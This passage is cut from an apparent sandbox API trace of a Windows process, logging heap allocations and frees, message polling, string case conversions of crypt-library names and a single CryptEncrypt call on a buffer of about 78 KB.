hHeap=0x970000) returned 1 [0254.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0254.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0254.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0254.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0254.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0254.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0254.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0254.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0254.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0254.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0254.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0254.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0254.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0254.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0254.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0254.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0254.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0254.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0254.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0254.254] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0254.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0254.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0254.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0254.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0254.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0254.254] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0254.254] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0254.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0254.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0254.254] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0254.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0254.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0254.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0254.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0254.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0254.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0254.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0254.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0254.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0254.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0254.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0254.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0254.255] CharLowerBuffW (in: lpsz="byte[78216]", cchLength=0xb | out: lpsz="byte[78216]") returned 0xb [0254.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b18 [0254.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0254.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0254.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0254.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0254.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0254.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0254.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0254.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0254.255] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0254.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0254.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0254.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0254.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0254.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0254.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0254.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0254.260] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0254.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0254.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0254.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0254.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0254.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0254.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0254.260] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0254.261] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0254.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0254.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0254.263] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0254.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0254.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0254.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0254.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0254.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0254.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51940 [0254.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51940, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0254.264] CryptEncrypt (in: hKey=0xa876d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e7f320*, pdwDataLen=0x8cef60*=0x13182, dwBufLen=0x13188 | out: pbData=0x2e7f320*, pdwDataLen=0x8cef60*=0x13188) returned 1 [0254.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0254.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0254.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0254.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0254.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0254.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0254.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0254.268] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0254.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0254.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0254.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0254.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0254.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0254.268] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0254.268] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0254.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0254.268] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0254.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0254.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0254.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0254.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0254.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69888 [0254.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b18 [0254.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0254.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0254.270] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0254.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0254.270] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0254.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0254.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0254.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0254.270] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0254.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0254.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0254.270] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0254.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0254.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0254.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51790 [0254.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0254.270] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0254.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0254.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0254.271] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0254.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0254.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0254.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51808 [0254.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0254.271] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0254.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0254.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0254.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0254.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0254.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0254.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0254.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0254.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0254.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0254.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518b0 [0254.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0254.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516a0 [0254.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51760 [0254.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51658 [0254.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0254.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0254.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516d0 [0254.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515e0 [0254.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517c0 [0254.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0254.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0254.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0254.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0254.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0254.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0254.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0254.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0254.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0254.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0254.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0254.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0254.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0254.272] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0254.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0254.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0254.272] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0254.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0254.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0254.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0254.272] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0254.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0254.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0254.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51718 [0254.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0254.272] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0254.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0254.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0254.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0254.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0254.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0254.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0254.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0254.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0254.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0254.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0254.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0254.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0254.273] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0254.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0254.273] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0254.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0254.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0254.273] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0254.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0254.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0254.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0254.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0254.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0254.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0254.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0254.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0254.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0254.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0254.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0254.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13188) returned 0x2e924b0 [0254.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0254.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0254.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13188) returned 0x2eb87d0 [0254.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0254.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0254.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e924b0 | out: hHeap=0x970000) returned 1 [0254.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0254.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0254.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0254.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0254.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0254.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13188) returned 0x2e924b0 [0254.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2eb87d0 | out: hHeap=0x970000) returned 1 [0254.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0254.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0254.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13188) returned 0x2eb87d0 [0254.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e924b0 | out: hHeap=0x970000) returned 1 [0254.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0254.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0254.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0254.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0254.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0254.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0254.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0254.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0254.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0254.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0254.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0254.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0254.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 